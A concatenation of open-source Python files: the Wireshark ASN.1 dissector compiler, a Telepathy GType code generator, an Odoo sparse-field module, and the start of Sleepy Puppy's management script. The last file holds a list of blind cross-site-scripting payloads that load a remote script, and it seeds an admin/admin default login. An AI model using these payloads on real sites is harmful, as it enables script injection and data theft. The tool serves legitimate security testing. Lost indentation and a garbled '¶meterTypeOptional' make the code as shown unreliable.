'AtNotations : AtNotations COMMA AtNotation'
t[0] = t[1] + [t[3]]
def p_AtNotation_1 (t):
'AtNotation : AT ComponentIdList'
t[0] = '@' + t[2]
def p_AtNotation_2 (t):
'AtNotation : AT DOT Level ComponentIdList'
t[0] = '@.' + t[3] + t[4]
def p_Level_1 (t):
'Level : DOT Level'
t[0] = '.' + t[2]
def p_Level_2 (t):
'Level : '
t[0] = ''
def p_ComponentIdList_1 (t):
'ComponentIdList : LCASE_IDENT'
t[0] = t[1]
def p_ComponentIdList_2 (t):
'ComponentIdList : ComponentIdList DOT LCASE_IDENT'
t[0] = t[1] + '.' + t[3]
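# Illustrative example: the table constraint "({Operations}{@opcode})" on an
# open type matches ComponentRelationConstraint above and is flattened to
# 'Operations' + str(['@opcode']), i.e. "Operations['@opcode']", which
# p_TableConstraint then wraps as Constraint(type = 'Table', subtype = ...).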
# 11 Contents constraints -----------------------------------------------------
# 11.1
def p_ContentsConstraint (t):
'ContentsConstraint : CONTAINING type_ref'
t[0] = Constraint(type = 'Contents', subtype = t[2])
#--- ITU-T Recommendation X.683 -----------------------------------------------
# 8 Parameterized assignments -------------------------------------------------
# 8.1
def p_ParameterizedAssignment (t):
'''ParameterizedAssignment : ParameterizedTypeAssignment
| ParameterizedObjectClassAssignment
| ParameterizedObjectAssignment
| ParameterizedObjectSetAssignment'''
t[0] = t[1]
# 8.2
def p_ParameterizedTypeAssignment (t):
'ParameterizedTypeAssignment : UCASE_IDENT ParameterList ASSIGNMENT Type'
t[0] = t[4]
t[0].SetName(t[1]) # t[0].SetName(t[1] + 'xxx')
def p_ParameterizedObjectClassAssignment (t):
'''ParameterizedObjectClassAssignment : CLASS_IDENT ParameterList ASSIGNMENT ObjectClass
| UCASE_IDENT ParameterList ASSIGNMENT ObjectClass'''
t[0] = t[4]
t[0].SetName(t[1])
if isinstance(t[0], ObjectClassDefn):
t[0].reg_types()
def p_ParameterizedObjectAssignment (t):
'ParameterizedObjectAssignment : objectreference ParameterList DefinedObjectClass ASSIGNMENT Object'
t[0] = ObjectAssignment (ident = t[1], cls=t[3].val, val=t[5])
global obj_class
obj_class = None
def p_ParameterizedObjectSetAssignment (t):
'ParameterizedObjectSetAssignment : UCASE_IDENT ParameterList DefinedObjectClass ASSIGNMENT ObjectSet'
t[0] = Node('ObjectSetAssignment', name=t[1], cls=t[3].val, val=t[5])
# 8.3
def p_ParameterList (t):
'ParameterList : lbraceignore rbraceignore'
#def p_ParameterList (t):
# 'ParameterList : LBRACE Parameters RBRACE'
# t[0] = t[2]
#def p_Parameters_1 (t):
# 'Parameters : Parameter'
# t[0] = [t[1]]
#def p_Parameters_2 (t):
# 'Parameters : Parameters COMMA Parameter'
# t[0] = t[1] + [t[3]]
#def p_Parameter_1 (t):
# 'Parameter : Type COLON Reference'
# t[0] = [t[1], t[3]]
#def p_Parameter_2 (t):
# 'Parameter : Reference'
# t[0] = t[1]
# 9 Referencing parameterized definitions -------------------------------------
# 9.1
def p_ParameterizedReference (t):
'ParameterizedReference : Reference LBRACE RBRACE'
t[0] = t[1]
#t[0].val += 'xxx'
# 9.2
def p_ParameterizedType (t):
'ParameterizedType : type_ref ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
def p_ParameterizedObjectClass (t):
'ParameterizedObjectClass : DefinedObjectClass ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
def p_ParameterizedObject (t):
'ParameterizedObject : DefinedObject ActualParameterList'
t[0] = t[1]
#t[0].val += 'xxx'
# 9.5
def p_ActualParameterList (t):
'ActualParameterList : lbraceignore rbraceignore'
#def p_ActualParameterList (t):
# 'ActualParameterList : LBRACE ActualParameters RBRACE'
# t[0] = t[2]
#def p_ActualParameters_1 (t):
# 'ActualParameters : ActualParameter'
# t[0] = [t[1]]
#def p_ActualParameters_2 (t):
# 'ActualParameters : ActualParameters COMMA ActualParameter'
# t[0] = t[1] + [t[3]]
#def p_ActualParameter (t):
# '''ActualParameter : Type
# | Value'''
# t[0] = t[1]
#--- ITU-T Recommendation X.880 -----------------------------------------------
x880_classes = {
'OPERATION' : {
'&ArgumentType' : [],
'&argumentTypeOptional' : [ 'BooleanType' ],
'&returnResult' : [ 'BooleanType' ],
'&ResultType' : [],
'&resultTypeOptional' : [ 'BooleanType' ],
'&Errors' : [ 'ClassReference', 'ERROR' ],
'&Linked' : [ 'ClassReference', 'OPERATION' ],
'&synchronous' : [ 'BooleanType' ],
'&idempotent' : [ 'BooleanType' ],
'&alwaysReturns' : [ 'BooleanType' ],
'&InvokePriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&ResultPriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&operationCode' : [ 'TypeReference', 'Code' ],
},
'ERROR' : {
'&ParameterType' : [],
'¶meterTypeOptional' : [ 'BooleanType' ],
'&ErrorPriority' : [ '_FixedTypeValueSetFieldSpec' ],
'&errorCode' : [ 'TypeReference', 'Code' ],
},
'OPERATION-PACKAGE' : {
'&Both' : [ 'ClassReference', 'OPERATION' ],
'&Consumer' : [ 'ClassReference', 'OPERATION' ],
'&Supplier' : [ 'ClassReference', 'OPERATION' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'CONNECTION-PACKAGE' : {
'&bind' : [ 'ClassReference', 'OPERATION' ],
'&unbind' : [ 'ClassReference', 'OPERATION' ],
'&responderCanUnbind' : [ 'BooleanType' ],
'&unbindCanFail' : [ 'BooleanType' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'CONTRACT' : {
'&connection' : [ 'ClassReference', 'CONNECTION-PACKAGE' ],
'&OperationsOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&InitiatorConsumerOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&InitiatorSupplierOf' : [ 'ClassReference', 'OPERATION-PACKAGE' ],
'&id' : [ 'ObjectIdentifierType' ],
},
'ROS-OBJECT-CLASS' : {
'&Is' : [ 'ClassReference', 'ROS-OBJECT-CLASS' ],
'&Initiates' : [ 'ClassReference', 'CONTRACT' ],
'&Responds' : [ 'ClassReference', 'CONTRACT' ],
'&InitiatesAndResponds' : [ 'ClassReference', 'CONTRACT' ],
'&id' : [ 'ObjectIdentifierType' ],
},
}
x880_syntaxes = {
'OPERATION' : {
'ARGUMENT' : '&ArgumentType',
'ARGUMENT OPTIONAL' : '&argumentTypeOptional',
'RESULT' : '&ResultType',
'RESULT OPTIONAL' : '&resultTypeOptional',
'RETURN' : 'RETURN',
'RETURN RESULT' : '&returnResult',
'ERRORS' : '&Errors',
'LINKED' : '&Linked',
'SYNCHRONOUS' : '&synchronous',
'IDEMPOTENT' : '&idempotent',
'ALWAYS' : 'ALWAYS',
'RESPONDS' : 'RESPONDS',
'ALWAYS RESPONDS' : '&alwaysReturns',
'INVOKE' : 'INVOKE',
'PRIORITY' : 'PRIORITY',
'INVOKE PRIORITY' : '&InvokePriority',
'RESULT-PRIORITY': '&ResultPriority',
'CODE' : '&operationCode',
},
'ERROR' : {
'PARAMETER' : '&ParameterType',
'PARAMETER OPTIONAL' : '¶meterTypeOptional',
'PRIORITY' : '&ErrorPriority',
'CODE' : '&errorCode',
},
# 'OPERATION-PACKAGE' : {
# },
# 'CONNECTION-PACKAGE' : {
# },
# 'CONTRACT' : {
# },
# 'ROS-OBJECT-CLASS' : {
# },
}
def x880_module_begin():
#print "x880_module_begin()"
for name in list(x880_classes.keys()):
add_class_ident(name)
def x880_import(name):
if name in x880_syntaxes:
class_syntaxes_enabled[name] = True
class_syntaxes[name] = x880_syntaxes[name]
if name in x880_classes:
add_class_ident(name)
for f in (list(x880_classes[name].keys())):
set_type_to_class(name, f, x880_classes[name][f])
tokens = tokens + get_syntax_tokens(x880_syntaxes)
# {...} OID value
#def p_lbrace_oid(t):
# 'lbrace_oid : brace_oid_begin LBRACE'
# t[0] = t[1]
#def p_brace_oid_begin(t):
# 'brace_oid_begin : '
# global in_oid
# in_oid = True
#def p_rbrace_oid(t):
# 'rbrace_oid : brace_oid_end RBRACE'
# t[0] = t[2]
#def p_brace_oid_end(t):
# 'brace_oid_end : '
# global in_oid
# in_oid = False
# {...} block to be ignored
def p_lbraceignore(t):
'lbraceignore : braceignorebegin LBRACE'
t[0] = t[1]
def p_braceignorebegin(t):
'braceignorebegin : '
global lexer
lexer.level = 1
lexer.push_state('braceignore')
def p_rbraceignore(t):
'rbraceignore : braceignoreend RBRACE'
t[0] = t[2]
def p_braceignoreend(t):
'braceignoreend : '
global lexer
lexer.pop_state()
def p_error(t):
global input_file
raise ParseError(t, input_file)
def p_pyquote (t):
'''pyquote : PYQUOTE'''
t[0] = PyQuote (val = t[1])
def testlex (s):
lexer.input (s)
while True:
token = lexer.token ()
if not token:
break
print(token)
def do_module (ast, defined_dict):
assert (ast.type == 'Module')
ctx = Ctx (defined_dict)
print(ast.to_python (ctx))
print(ctx.output_assignments ())
print(ctx.output_pyquotes ())
def eth_do_module (ast, ectx):
assert (ast.type == 'Module')
if ectx.dbg('s'): print(ast.str_depth(0))
ast.to_eth(ectx)
def testyacc(s, fn, defined_dict):
ast = yacc.parse(s, debug=0)
time_str = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime())
print("""#!/usr/bin/env python
# Auto-generated from %s at %s
from PyZ3950 import asn1""" % (fn, time_str))
for module in ast:
        do_module (module, defined_dict) # PyZ3950 output path; eth_do_module expects an EthCtx, not a dict
# Wireshark compiler
def eth_usage():
print("""
asn2wrs [-h|?] [-d dbg] [-b] [-p proto] [-c cnf_file] [-e] input_file(s) ...
-h|? : Usage
-b : BER (default is PER)
-u : Unaligned (default is aligned)
-p proto : Protocol name (implies -S). Default is module-name
from input_file (renamed by #.MODULE if present)
-o name : Output files name core (default is <proto>)
-O dir : Output directory for dissector
-c cnf_file : Conformance file
-I path : Path for conformance file includes
-e : Create conformance file for exported types
-E : Just create conformance file for exported types
-S : Single output for multiple modules
-s template : Single file output (template is input file
without .c/.h extension)
-k : Keep intermediate files though single file output is used
-L : Suppress #line directive from .cnf file
-D dir : Directory for input_file(s) (default: '.')
-C : Add check for SIZE constraints
-r prefix : Remove the prefix from type names
input_file(s) : Input ASN.1 file(s)
-d dbg : Debug output, dbg = [l][y][p][s][a][t][c][m][o]
l - lex
y - yacc
p - parsing
s - internal ASN.1 structure
a - list of assignments
t - tables
c - conformance values
m - list of compiled modules with dependency
o - list of output files
""")
def eth_main():
global input_file
global g_conform
global lexer
print("ASN.1 to Wireshark dissector compiler");
try:
opts, args = getopt.getopt(sys.argv[1:], "h?d:D:buXp:FTo:O:c:I:eESs:kLCr:");
except getopt.GetoptError:
eth_usage(); sys.exit(2)
if len(args) < 1:
eth_usage(); sys.exit(2)
conform = EthCnf()
conf_to_read = None
output = EthOut()
ectx = EthCtx(conform, output)
ectx.encoding = 'per'
ectx.proto_opt = None
ectx.fld_opt = {}
ectx.tag_opt = False
ectx.outnm_opt = None
ectx.aligned = True
ectx.dbgopt = ''
ectx.new = True
ectx.expcnf = False
ectx.justexpcnf = False
ectx.merge_modules = False
ectx.group_by_prot = False
ectx.conform.last_group = 0
    ectx.conform.suppress_line = False
ectx.output.outnm = None
ectx.output.single_file = None
    ectx.constraints_check = False
for o, a in opts:
if o in ("-h", "-?"):
eth_usage(); sys.exit(2)
if o in ("-c",):
conf_to_read = a
if o in ("-I",):
ectx.conform.include_path.append(a)
if o in ("-E",):
ectx.expcnf = True
ectx.justexpcnf = True
if o in ("-D",):
ectx.srcdir = a
if o in ("-C",):
ectx.constraints_check = True
if o in ("-X",):
warnings.warn("Command line option -X is obsolete and can be removed")
if o in ("-T",):
warnings.warn("Command line option -T is obsolete and can be removed")
if conf_to_read:
ectx.conform.read(conf_to_read)
for o, a in opts:
if o in ("-h", "-?", "-c", "-I", "-E", "-D", "-C", "-X", "-T"):
pass # already processed
else:
par = []
if a: par.append(a)
ectx.conform.set_opt(o, par, "commandline", 0)
    (ld, yd, pd) = (0, 0, 0)
if ectx.dbg('l'): ld = 1
if ectx.dbg('y'): yd = 1
if ectx.dbg('p'): pd = 2
lexer = lex.lex(debug=ld)
yacc.yacc(method='LALR', debug=yd)
g_conform = ectx.conform
ast = []
for fn in args:
input_file = fn
lexer.lineno = 1
if (ectx.srcdir): fn = ectx.srcdir + '/' + fn
# Read ASN.1 definition, trying one of the common encodings.
data = open(fn, "rb").read()
for encoding in ('utf-8', 'windows-1252'):
try:
data = data.decode(encoding)
break
            except UnicodeDecodeError:
                warnings.warn_explicit("Decoding %s as %s failed, trying next." % (fn, encoding), UserWarning, '', 0)
# Py2 compat, name.translate in eth_output_hf_arr fails with unicode
if not isinstance(data, str):
data = data.encode('utf-8')
ast.extend(yacc.parse(data, lexer=lexer, debug=pd))
ectx.eth_clean()
    if (ectx.merge_modules): # common output for all modules
ectx.eth_clean()
for module in ast:
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
elif (ectx.groups()): # group by protocols/group
groups = []
pr2gr = {}
if (ectx.group_by_prot): # group by protocols
for module in ast:
prot = module.get_proto(ectx)
if prot not in pr2gr:
pr2gr[prot] = len(groups)
groups.append([])
groups[pr2gr[prot]].append(module)
else: # group by groups
pass
for gm in (groups):
ectx.eth_clean()
for module in gm:
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
else: # output for each module
for module in ast:
ectx.eth_clean()
eth_do_module(module, ectx)
ectx.eth_prepare()
ectx.eth_do_output()
if ectx.dbg('m'):
ectx.dbg_modules()
if ectx.dbg('c'):
ectx.conform.dbg_print()
if not ectx.justexpcnf:
ectx.conform.unused_report()
if ectx.dbg('o'):
ectx.output.dbg_print()
ectx.output.make_single_file()
# Python compiler
def main():
testfn = testyacc
if len (sys.argv) == 1:
while True:
s = input ('Query: ')
if len (s) == 0:
break
testfn (s, 'console', {})
else:
defined_dict = {}
for fn in sys.argv [1:]:
f = open (fn, "r")
testfn (f.read (), fn, defined_dict)
f.close ()
lexer.lineno = 1
#--- BODY ---------------------------------------------------------------------
if __name__ == '__main__':
if (os.path.splitext(os.path.basename(sys.argv[0]))[0].lower() in ('asn2wrs', 'asn2eth')):
eth_main()
else:
main()
#------------------------------------------------------------------------------
#
# Editor modelines - http://www.wireshark.org/tools/modelines.html
#
# c-basic-offset: 4; tab-width: 8; indent-tabs-mode: nil
# vi: set shiftwidth=4 tabstop=8 expandtab:
# :indentSize=4:tabSize=8:noTabs=true:
| weinrank/wireshark | tools/asn2wrs.py | Python | gpl-2.0 | 308,942 |
#!/usr/bin/python
# Generate GLib GInterfaces from the Telepathy specification.
# The master copy of this program is in the telepathy-glib repository -
# please make any changes there.
#
# Copyright (C) 2006, 2007 Collabora Limited
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import sys
import xml.dom.minidom
from libglibcodegen import escape_as_identifier, \
get_docstring, \
NS_TP, \
Signature, \
type_to_gtype, \
xml_escape
def types_to_gtypes(types):
return [type_to_gtype(t)[1] for t in types]
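# type_to_gtype(t)[1] is the GType macro for a D-Bus type code, so assuming
# libglibcodegen's usual mapping one would expect, e.g.:
#   types_to_gtypes(tuple(Signature('su'))) -> ['G_TYPE_STRING', 'G_TYPE_UINT']
# These strings are later pasted into dbus_g_type_get_map()/_get_struct() calls.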
class GTypesGenerator(object):
def __init__(self, dom, output, mixed_case_prefix):
self.dom = dom
self.Prefix = mixed_case_prefix
self.PREFIX_ = self.Prefix.upper() + '_'
self.prefix_ = self.Prefix.lower() + '_'
self.header = open(output + '.h', 'w')
self.body = open(output + '-body.h', 'w')
self.docs = open(output + '-gtk-doc.h', 'w')
for f in (self.header, self.body, self.docs):
f.write('/* Auto-generated, do not edit.\n *\n'
' * This file may be distributed under the same terms\n'
' * as the specification from which it was generated.\n'
' */\n\n')
# keys are e.g. 'sv', values are the key escaped
self.need_mappings = {}
# keys are the contents of the struct (e.g. 'sssu'), values are the
# key escaped
self.need_structs = {}
# keys are the contents of the struct (e.g. 'sssu'), values are the
# key escaped
self.need_struct_arrays = {}
# keys are the contents of the array (unlike need_struct_arrays!),
# values are the key escaped
self.need_other_arrays = {}
def h(self, code):
self.header.write(code.encode("utf-8"))
def c(self, code):
self.body.write(code.encode("utf-8"))
def d(self, code):
self.docs.write(code.encode('utf-8'))
def do_mapping_header(self, mapping):
members = mapping.getElementsByTagNameNS(NS_TP, 'member')
assert len(members) == 2
impl_sig = ''.join([elt.getAttribute('type')
for elt in members])
esc_impl_sig = escape_as_identifier(impl_sig)
name = (self.PREFIX_ + 'HASH_TYPE_' +
mapping.getAttribute('name').upper())
impl = self.prefix_ + 'type_dbus_hash_' + esc_impl_sig
docstring = get_docstring(mapping) or '(Undocumented)'
self.d('/**\n * %s:\n *\n' % name)
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' * This macro expands to a call to a function\n')
self.d(' * that returns the #GType of a #GHashTable\n')
self.d(' * appropriate for representing a D-Bus\n')
self.d(' * dictionary of signature\n')
self.d(' * <literal>a{%s}</literal>.\n' % impl_sig)
self.d(' *\n')
key, value = members
self.d(' * Keys (D-Bus type <literal>%s</literal>,\n'
% key.getAttribute('type'))
tp_type = key.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% key.getAttribute('name'))
docstring = get_docstring(key) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' * Values (D-Bus type <literal>%s</literal>,\n'
% value.getAttribute('type'))
tp_type = value.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% value.getAttribute('name'))
docstring = get_docstring(value) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' */\n')
self.h('#define %s (%s ())\n\n' % (name, impl))
self.need_mappings[impl_sig] = esc_impl_sig
array_name = mapping.getAttribute('array-name')
if array_name:
gtype_name = self.PREFIX_ + 'ARRAY_TYPE_' + array_name.upper()
contents_sig = 'a{' + impl_sig + '}'
esc_contents_sig = escape_as_identifier(contents_sig)
impl = self.prefix_ + 'type_dbus_array_of_' + esc_contents_sig
            self.d('/**\n * %s:\n *\n' % gtype_name)
self.d(' * Expands to a call to a function\n')
self.d(' * that returns the #GType of a #GPtrArray\n')
self.d(' * of #%s.\n' % name)
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (gtype_name, impl))
self.need_other_arrays[contents_sig] = esc_contents_sig
def do_struct_header(self, struct):
members = struct.getElementsByTagNameNS(NS_TP, 'member')
impl_sig = ''.join([elt.getAttribute('type') for elt in members])
esc_impl_sig = escape_as_identifier(impl_sig)
name = (self.PREFIX_ + 'STRUCT_TYPE_' +
struct.getAttribute('name').upper())
impl = self.prefix_ + 'type_dbus_struct_' + esc_impl_sig
docstring = struct.getElementsByTagNameNS(NS_TP, 'docstring')
if docstring:
docstring = docstring[0].toprettyxml()
if docstring.startswith('<tp:docstring>'):
docstring = docstring[14:]
if docstring.endswith('</tp:docstring>\n'):
docstring = docstring[:-16]
if docstring.strip() in ('<tp:docstring/>', ''):
docstring = '(Undocumented)'
else:
docstring = '(Undocumented)'
        self.d('/**\n * %s:\n *\n' % name)
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' * This macro expands to a call to a function\n')
self.d(' * that returns the #GType of a #GValueArray\n')
self.d(' * appropriate for representing a D-Bus struct\n')
self.d(' * with signature <literal>(%s)</literal>.\n'
% impl_sig)
self.d(' *\n')
for i, member in enumerate(members):
self.d(' * Member %d (D-Bus type '
'<literal>%s</literal>,\n'
% (i, member.getAttribute('type')))
tp_type = member.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% member.getAttribute('name'))
docstring = get_docstring(member) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (name, impl))
array_name = struct.getAttribute('array-name')
if array_name != '':
array_name = (self.PREFIX_ + 'ARRAY_TYPE_' + array_name.upper())
impl = self.prefix_ + 'type_dbus_array_' + esc_impl_sig
            self.d('/**\n * %s:\n *\n' % array_name)
self.d(' * Expands to a call to a function\n')
self.d(' * that returns the #GType of a #GPtrArray\n')
self.d(' * of #%s.\n' % name)
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (array_name, impl))
self.need_struct_arrays[impl_sig] = esc_impl_sig
self.need_structs[impl_sig] = esc_impl_sig
def __call__(self):
mappings = self.dom.getElementsByTagNameNS(NS_TP, 'mapping')
structs = self.dom.getElementsByTagNameNS(NS_TP, 'struct')
for mapping in mappings:
self.do_mapping_header(mapping)
for sig in self.need_mappings:
self.h('GType %stype_dbus_hash_%s (void);\n\n' %
(self.prefix_, self.need_mappings[sig]))
self.c('GType\n%stype_dbus_hash_%s (void)\n{\n' %
(self.prefix_, self.need_mappings[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
# FIXME: translate sig into two GTypes
items = tuple(Signature(sig))
gtypes = types_to_gtypes(items)
self.c(' t = dbus_g_type_get_map ("GHashTable", '
'%s, %s);\n' % (gtypes[0], gtypes[1]))
self.c(' return t;\n')
self.c('}\n\n')
for struct in structs:
self.do_struct_header(struct)
for sig in self.need_structs:
self.h('GType %stype_dbus_struct_%s (void);\n\n' %
(self.prefix_, self.need_structs[sig]))
self.c('GType\n%stype_dbus_struct_%s (void)\n{\n' %
(self.prefix_, self.need_structs[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
self.c(' t = dbus_g_type_get_struct ("GValueArray",\n')
items = tuple(Signature(sig))
gtypes = types_to_gtypes(items)
for gtype in gtypes:
self.c(' %s,\n' % gtype)
self.c(' G_TYPE_INVALID);\n')
self.c(' return t;\n')
self.c('}\n\n')
for sig in self.need_struct_arrays:
self.h('GType %stype_dbus_array_%s (void);\n\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c('GType\n%stype_dbus_array_%s (void)\n{\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
self.c(' t = dbus_g_type_get_collection ("GPtrArray", '
'%stype_dbus_struct_%s ());\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c(' return t;\n')
self.c('}\n\n')
for sig in self.need_other_arrays:
self.h('GType %stype_dbus_array_of_%s (void);\n\n' %
(self.prefix_, self.need_other_arrays[sig]))
self.c('GType\n%stype_dbus_array_of_%s (void)\n{\n' %
(self.prefix_, self.need_other_arrays[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
if sig[:2] == 'a{' and sig[-1:] == '}':
# array of mappings
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_hash_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[2:-1])))
elif sig[:2] == 'a(' and sig[-1:] == ')':
# array of arrays of struct
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_array_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[2:-1])))
elif sig[:1] == 'a':
# array of arrays of non-struct
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_array_of_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[1:])))
else:
raise AssertionError("array of '%s' not supported" % sig)
self.c(' return t;\n')
self.c('}\n\n')
if __name__ == '__main__':
argv = sys.argv[1:]
dom = xml.dom.minidom.parse(argv[0])
GTypesGenerator(dom, argv[1], argv[2])()
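    # Typical invocation (file names are illustrative):
    #   python glib-gtypes-generator.py spec/all.xml out/example-gtypes Example
    # parses spec/all.xml and writes out/example-gtypes.h,
    # out/example-gtypes-body.h and out/example-gtypes-gtk-doc.h using an
    # EXAMPLE_/example_ symbol prefix.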
| JGulic/empathy | tools/glib-gtypes-generator.py | Python | gpl-2.0 | 12,522 |
# -*- coding: utf-8 -*-
import json
from odoo import fields
def monkey_patch(cls):
""" Return a method decorator to monkey-patch the given class. """
def decorate(func):
name = func.__name__
func.super = getattr(cls, name, None)
setattr(cls, name, func)
return func
return decorate
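# Illustrative use of the decorator (class and method names are examples,
# not part of this module):
#
#   class Greeter(object):
#       def greet(self):
#           return "hi"
#
#   @monkey_patch(Greeter)
#   def greet(self):
#       return greet.super(self) + "!"   # original stays reachable as .super
#
#   assert Greeter().greet() == "hi!"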
#
# Implement sparse fields by monkey-patching fields.Field
#
fields.Field.__doc__ += """
.. _field-sparse:
.. rubric:: Sparse fields
    Sparse fields have a very small probability of being non-null. Therefore
many such fields can be serialized compactly into a common location, the
latter being a so-called "serialized" field.
:param sparse: the name of the field where the value of this field must
be stored.
"""
@monkey_patch(fields.Field)
def _get_attrs(self, model, name):
attrs = _get_attrs.super(self, model, name)
if attrs.get('sparse'):
# by default, sparse fields are not stored and not copied
attrs['store'] = False
attrs['copy'] = attrs.get('copy', False)
attrs['compute'] = self._compute_sparse
if not attrs.get('readonly'):
attrs['inverse'] = self._inverse_sparse
return attrs
@monkey_patch(fields.Field)
def _compute_sparse(self, records):
for record in records:
values = record[self.sparse]
record[self.name] = values.get(self.name)
if self.relational:
for record in records:
record[self.name] = record[self.name].exists()
@monkey_patch(fields.Field)
def _inverse_sparse(self, records):
for record in records:
values = record[self.sparse]
value = self.convert_to_read(record[self.name], record, use_name_get=False)
if value:
if values.get(self.name) != value:
values[self.name] = value
record[self.sparse] = values
else:
if self.name in values:
values.pop(self.name)
record[self.sparse] = values
#
# Definition and implementation of serialized fields
#
class Serialized(fields.Field):
""" Serialized fields provide the storage for sparse fields. """
type = 'serialized'
_slots = {
'prefetch': False, # not prefetched by default
}
column_type = ('text', 'text')
def convert_to_column(self, value, record, values=None):
return json.dumps(value)
def convert_to_cache(self, value, record, validate=True):
# cache format: dict
value = value or {}
return value if isinstance(value, dict) else json.loads(value)
fields.Serialized = Serialized
| Aravinthu/odoo | addons/base_sparse_field/models/fields.py | Python | agpl-3.0 | 2,668 |
#!/usr/bin/env python
# Copyright 2015 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import os
from flask_script.commands import ShowUrls, Clean
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from sleepypuppy.admin.admin.models import Administrator
from sleepypuppy import app, db
from js_strings import default_script, alert_box, console_log, default_without_screenshot, generic_collector
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
@manager.shell
def make_shell_context():
"""
Creates a python REPL with several default imports
in the context of the app
"""
return dict(app=app)
@manager.command
def create_db():
"""
Creates a database with all of the tables defined in
your Alchemy models
"""
db.create_all()
@manager.command
def drop_db():
"""
Drops a database with all of the tables defined in
your Alchemy models
"""
db.drop_all()
@manager.command
def create_login(login):
"""
Seed the database with an admin user.
"""
print 'creating admin user'
if Administrator.query.filter_by(login=login).count():
print 'user already exists!'
return
# Check env for credentials (used by docker)
docker_admin_pass = os.getenv('DOCKER_ADMIN_PASS', None)
if docker_admin_pass:
admin_user = Administrator(login=login, password=docker_admin_pass)
else:
# else, ask on stdin:
while True:
print "{}, enter your password!\n ".format(login)
pw1 = getpass.getpass()
pw2 = getpass.getpass(prompt="Confirm: ")
if pw1 == pw2:
admin_user = Administrator(login=login, password=pw1)
break
else:
print 'passwords do not match!'
db.session.add(admin_user)
db.session.commit()
print 'user: ' + login + ' created!'
@manager.command
def default_login():
"""
Seed the database with some inital values
"""
existing_admin = Administrator.query.filter(
Administrator.login == 'admin').first()
if existing_admin:
print "Admin account (admin) already exists, skipping."
else:
admin_user = Administrator(login='admin', password='admin')
print 'user: ' + 'admin' + ' created!'
db.session.add(admin_user)
db.session.commit()
return
from collections import namedtuple
DefaultPayload = namedtuple(
'DefaultPayload', ['payload', 'notes', 'snooze', 'run_once'])
DEFAULT_PAYLOADS = [
DefaultPayload('<script src=$1></script>', None, False, False),
DefaultPayload('</script><script src=$1>', None, False, False),
DefaultPayload(
'<script src=$1></script>', None, False, False),
DefaultPayload('</script><script src=$1>',
None, False, False),
DefaultPayload('''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''', None, False, False), # noqa
DefaultPayload("""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False), # noqa
DefaultPayload("""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False) # noqa
]
DefaultPuppyscript = namedtuple('DefaultPuppyscript', ['name', 'code', 'notes'])
DEFAULT_JAVASCRIPTS = [
